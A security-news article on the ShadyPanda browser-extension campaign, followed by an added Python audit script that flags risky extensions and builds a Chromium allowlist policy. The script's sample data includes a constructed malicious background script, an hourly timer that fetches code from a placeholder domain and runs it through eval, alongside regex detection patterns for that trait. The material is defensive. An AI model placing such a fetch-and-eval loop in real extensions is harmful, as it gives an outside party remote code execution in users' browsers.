Are your verified browser plugins secretly spying on you?
Security researchers at Koi.ai identified a massive malware campaign on December 1, 2025, compromising approximately 4.3 million users. The threat actor, designated “ShadyPanda,” leveraged the architecture of browser extension marketplaces to distribute malicious code. This operation targeted Google Chrome and Microsoft Edge users through a sophisticated, seven-year strategy of patience and deception.
The attack highlights a critical flaw in the digital supply chain: trust. ShadyPanda did not hack these browsers directly. Instead, they utilized legitimate channels to distribute “Clean Master” and “WeTab,” gaining “Verified” and “Featured” status from platform operators. Once installed on millions of devices, these extensions weaponized the automatic update feature to deploy malware.
The Strategy: Legitimacy as a Trojan Horse
ShadyPanda exploited the review protocols of Google and Microsoft. Marketplaces rigorously audit code upon initial submission but often lack continuous behavioral monitoring for subsequent updates.
- Establish Reputation (2018–2023): The group uploaded functional, benign extensions masquerading as wallpapers, cache cleaners, or productivity tools.
- Accumulate Users: By maintaining clean code for years, they earned marketplace endorsements and user trust, amassing over 300,000 installs for tools like “Clean Master.”
- Weaponize Updates (2024): Once the user base was significant, ShadyPanda pushed malicious code via background auto-updates. This bypassed the stringent initial review process, delivering malware directly to trusted environments.
Escalation of Threats
The campaign evolved from simple financial fraud to invasive surveillance and remote control.
Phase 1: Affiliate Fraud (2023)
Initial attacks focused on monetization through “cookie stuffing.” Extensions under publishers like nuggetsno15 and rocket Zhang silently injected tracking codes when users visited sites like Amazon, eBay, or Booking.com. This allowed the attackers to claim unearned commissions on user purchases while logging search queries via Google Analytics.
Phase 2: Remote Execution and Espionage (2024–2025)
The operation aggressively pivoted toward total browser compromise.
- RCE Backdoor: Five extensions, including “Clean Master,” gained the ability to download and execute arbitrary JavaScript hourly. This Remote Code Execution (RCE) capability allowed attackers to monitor all web traffic, exfiltrate encrypted history, and fingerprint devices.
- Mass Surveillance: The “WeTab” extension, currently installed on 3 million devices, functions as active spyware. It captures URLs, search queries, and mouse clicks, transmitting this data to servers in China (specifically Baidu and WeTab-controlled domains).
The Persistence of the Threat
While Google removed the identified Chrome extensions, the threat persists in the Microsoft Edge ecosystem. As of December 2025, extensions by Starlab Technology—the publisher behind the compromised Edge versions—remain available. The WeTab New Tab Page continues to operate, creating a live surveillance network of 4 million users.
Systemic Vulnerabilities and Enterprise Risk
This campaign demonstrates that the “auto-update” mechanism, designed for security patching, is now a potent attack vector.
For organizations, the risk extends beyond individual privacy. An infected developer workstation grants ShadyPanda visibility into internal networks. Because modern SaaS platforms, cloud consoles, and code repositories rely on browser-based authentication, these extensions can bypass traditional firewalls to harvest API keys, session tokens, and proprietary data.
Advisory Recommendation
Administrators and individuals must immediately audit installed extensions. Treat “Verified” badges with skepticism. If an extension is not essential for daily operations, remove it. For enterprise environments, enforce policies that restrict extension installation to a strict allowlist to prevent supply chain compromise.
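The following audit script is an added example written for this article; it is not tooling from Koi.ai, Google or Microsoft, and every extension ID, domain and source file in it is a constructed placeholder. It serves both the "Remote Execution and Espionage" section and this advisory: given an inventory of installed extensions (ID, manifest, JavaScript sources), it flags anything outside the enterprise allowlist and anything exhibiting the traits described above: access to every site, an update channel that is not one of the two official stores, and a recurring timer that fetches remote content and feeds it to dynamic code execution. It also emits the Chromium enterprise policy pair (ExtensionInstallBlocklist / ExtensionInstallAllowlist, which are the real policy names) that enforces a strict allowlist.

```python
"""Extension audit helper added for this article (not Koi.ai's tooling).

Checks each installed extension against an allowlist and flags traits that
match the ShadyPanda pattern. All inputs are constructed samples; the
32-character extension IDs and domains below are placeholders.
"""
from __future__ import annotations

import json
import re
from dataclasses import dataclass, field

# Update endpoints of the two official stores. Any other update_url means the
# extension is updated from a publisher-controlled server.
STORE_UPDATE_URLS = {
    "https://clients2.google.com/service/update2/crx",
    "https://edge.microsoft.com/extensionwebstorebase/v1/crx",
}

# Host patterns that grant access to every site the user visits.
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}

# Heuristics, not proof: string-to-code execution, a network fetch and a
# recurring timer. All three together match "download and execute hourly".
DYNAMIC_EXEC = re.compile(r"\beval\s*\(|new\s+Function\s*\(")
REMOTE_FETCH = re.compile(r"\bfetch\s*\(|XMLHttpRequest")
TIMER = re.compile(r"alarms\.create\s*\(|setInterval\s*\(")


@dataclass
class Finding:
    ext_id: str
    name: str
    reasons: list[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)


def audit_extension(ext_id: str, manifest: dict, sources: dict[str, str],
                    allowlist: set[str]) -> Finding:
    """Return a Finding listing every policy or behaviour concern."""
    f = Finding(ext_id, manifest.get("name", "<unnamed>"))
    if ext_id not in allowlist:
        f.reasons.append("not on the enterprise allowlist")
    # Manifest V2 lists host patterns under "permissions", V3 under "host_permissions".
    hosts = set(manifest.get("permissions", [])) | set(manifest.get("host_permissions", []))
    if hosts & BROAD_HOSTS:
        f.reasons.append("requests access to all sites")
    update_url = manifest.get("update_url")
    if update_url and update_url not in STORE_UPDATE_URLS:
        f.reasons.append(f"non-store update channel: {update_url}")
    code = "\n".join(sources.values())
    if DYNAMIC_EXEC.search(code) and REMOTE_FETCH.search(code):
        f.reasons.append("fetches remote content and executes code from a string")
        if TIMER.search(code):
            f.reasons.append("fetch is scheduled on a recurring timer")
    return f


def audit_inventory(inventory: list[dict], allowlist: set[str]) -> list[Finding]:
    """Audit every extension and return only those with findings."""
    results = [audit_extension(e["id"], e["manifest"], e["sources"], allowlist)
               for e in inventory]
    return [r for r in results if r.suspicious]


def build_policy(allowlist: set[str]) -> dict:
    """Chromium enterprise policy: block every extension except the allowlist."""
    return {"ExtensionInstallBlocklist": ["*"],
            "ExtensionInstallAllowlist": sorted(allowlist)}


# --- constructed sample inventory (placeholder IDs, not real extensions) ---
ALLOWLIST = {"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"}  # the single approved extension

SAMPLE_INVENTORY = [
    {"id": "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
     "manifest": {"name": "Corp SSO Helper", "manifest_version": 3,
                  "host_permissions": ["https://sso.example.internal/*"],
                  "update_url": "https://clients2.google.com/service/update2/crx"},
     "sources": {"background.js": "chrome.runtime.onInstalled.addListener(() => {});"}},
    {"id": "bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb",
     "manifest": {"name": "Wallpaper New Tab", "manifest_version": 2,
                  "permissions": ["tabs", "<all_urls>"],
                  "update_url": "https://updates.example-publisher.test/crx"},
     # Constructed sample of the pattern the report describes; fake domains.
     "sources": {"background.js": (
         "chrome.alarms.create('tick', {periodInMinutes: 60});\n"
         "chrome.alarms.onAlarm.addListener(async () => {\n"
         "  const r = await fetch('https://cdn.example-publisher.test/p.js');\n"
         "  eval(await r.text());\n"
         "});")}},
]

if __name__ == "__main__":
    for finding in audit_inventory(SAMPLE_INVENTORY, ALLOWLIST):
        print(finding.ext_id, finding.name)
        for reason in finding.reasons:
            print("  -", reason)
    print(json.dumps(build_policy(ALLOWLIST), indent=2))
```

To run this against a real fleet, build the inventory from each profile's unpacked extension directories (on Chrome and Edge each installed extension lives under the profile's `Extensions/<id>/<version>/` folder with its `manifest.json` and scripts) and replace the placeholder allowlist with the IDs your organisation approves. The regex checks are heuristics: minified or obfuscated code can hide the pattern, and a match is a reason to inspect, not a verdict. Deploy the generated policy through your management channel and confirm it took effect on the `chrome://policy` (or `edge://policy`) page.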